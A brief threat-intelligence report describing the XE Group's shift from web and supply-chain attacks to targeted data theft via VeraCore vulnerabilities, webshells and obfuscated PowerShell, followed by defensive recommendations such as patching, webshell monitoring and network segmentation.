Threat Report: XE Group Evolution

Introduction

The XE Group, a cybercriminal organization active since 2013, has evolved its tactics, techniques, and procedures (TTPs) significantly. Initially focused on web vulnerabilities and supply chain attacks, the group has shifted towards targeted information theft in manufacturing and distribution sectors

Threat Overview

• Evolution of TTPs: XE Group has demonstrated increased sophistication by exploiting previously undocumented vulnerabilities in VeraCore software, including an SQL injection flaw and an upload validation vulnerability.

• Long-term Access: The group maintains long-term access to compromised systems, as evidenced by reactivating a webshell planted years earlier.

• Recent Activities: Their recent activities involve exfiltrating config files, network reconnaissance, and deploying a Remote Access Trojan using obfuscated PowerShell commands.

Implications

The evolution of XE Group highlights their adaptability and growing threat to supply chain security. Organizations in manufacturing and distribution sectors should be particularly vigilant.

Recommendations

1. Patch Management: Ensure timely patching of vulnerabilities in VeraCore software and other systems to prevent exploitations.

2. Monitor Webshells: Regularly scan and monitor for webshells, especially those planted long ago that may be reactivated.

3. Strengthen Access Controls: Implement strong access controls to limit unauthorized access and maintain audit trails.

4. Network Segmentation: Segment networks to contain potential breaches and reduce the risk of lateral movement.

5. PowerShell Script Scanning: Employ tools to scan for obfuscated PowerShell commands used in malware delivery.

6. Threat Intelligence: Stay informed about emerging threats like XE Group through threat intelligence feeds.

References

• Inteze Blog